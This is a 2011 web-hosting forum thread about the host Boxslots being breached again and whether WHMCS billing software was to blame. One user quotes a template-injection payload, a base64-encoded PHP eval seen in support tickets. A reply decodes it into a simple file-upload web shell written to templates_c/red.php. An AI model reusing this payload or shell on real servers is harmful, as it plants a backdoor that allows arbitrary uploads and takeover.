Boxslots hacked AGAIN

**dotvps** · 7th Dec 2011, 01:15 AM

Originally Posted by viruz99

Well like i said in the first post 99% of hosts here use whmcs - even smaller & noob companies that know little about security , yet nobody reported any hacking in the last few days/weeks.

If it was just random , dozen of other hosts would have been hacked as well.

+ same company twice in the same week....hmmm

People have tried to hack my WHMCS all day today. with the same exploit its getting annoying to log in to the ticket: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX 2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw= ='));{/php})

dotvps Reviewed by dotvps on 7th Dec 2011. Boxslots hacked AGAIN * Saw lots of customers filling up the boxslots sales threads - Bitch about it here instead (y) They are claiming its due to whmcs again but well 99% hosts on KWWH are using it and none are having these issues Rating: 5

**Loonycgb2** · 7th Dec 2011, 01:42 AM

Originally Posted by dotvps

People have tried to hack my WHMCS all day today. with the same exploit its getting annoying to log in to the ticket: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX 2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw= ='));{/php})

thats a worthless code

Code:

$code = <?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>;
$fo = fopen("templates_c/red.php","w");
fwrite($fo,$code);

**fewcent** · 6th Dec 2011, 09:59 PM

Fun fact for the day: There can be things called "Hidden Exploits"!

I won't go in details or debate..

Just to let u know the thing "Hidden Exploits" does exist...Search Engine is your friend.

Yahoo-rogers server was having hidden exploits(was found out by a guy) which allowed ppl to create id's with symbols which were banned by Yahoo.He used it for almost year to create & sell those special Id's..yahoo finally found it & patched it.

People act to know everything...specially if they r running some hosting solution on managed Server ...

Maybe its SQL injection or sum other attack and not WHMCS.

**fewcent** · 6th Dec 2011, 08:18 PM

I guess, there are some hidden exploits out or maybe hacker already has gotten access details before boxslots patched whmcs.

**Mr Happy** · 6th Dec 2011, 08:19 PM

I don't care what script anyone is using if a host get's hacked twice in a few days they need to change career.

**Krun!x** · 6th Dec 2011, 08:23 PM

Originally Posted by Mr Happy

I don't care what script anyone is using if a host get's hacked twice in a few days they need to change career.

Word. I Couldn't agree more.

**ScopeHosts.Sales** · 6th Dec 2011, 08:21 PM

There are possibilities of bugs to be found . As latest releases are having major changes being made .

Example : WHMCS developer - Matt Himself as expressed that the bug was found since WHMCS v4 .

Lets wait what WHMCS as to say regarding boxslots reports .

**XSLTel** · 6th Dec 2011, 09:19 PM

^

its simple competitors are jealous because BS was the only provider who offered RS clients 16TB free backup servers.

I guess someone got butthurt because of that and started this continuous attacks on BS.

anyway good luck for all

**Th3KiNG** · 6th Dec 2011, 09:48 PM

**bachbell** · 6th Dec 2011, 09:53 PM

KWWH mods in this case , BX must refund people who wants to leave or not?

Boxslots hacked AGAIN

Thread Tools

Display

Hybrid View

Sponsored Links

Thread Information

Users Browsing this Thread

Similar Threads

Boxslots are cool :)

[VPS] BoxSlots.com - Unmetered 100Mbit/1Gbit/2Gbit VPS from ?10.99/month (CS: Hacked)

Boxslots hacked AGAIN!!!!!!!!!!!!!!! (3rd edition)

[Discussion] Boxslots - Hacked & What's Going On |

Tags for this Thread

Posting Permissions

themaCreator - create posts from...

themaCreator - create posts from...

themaPoster - post to forums and...

themaLeecher - leech and manage...

themaManager - edit and manage...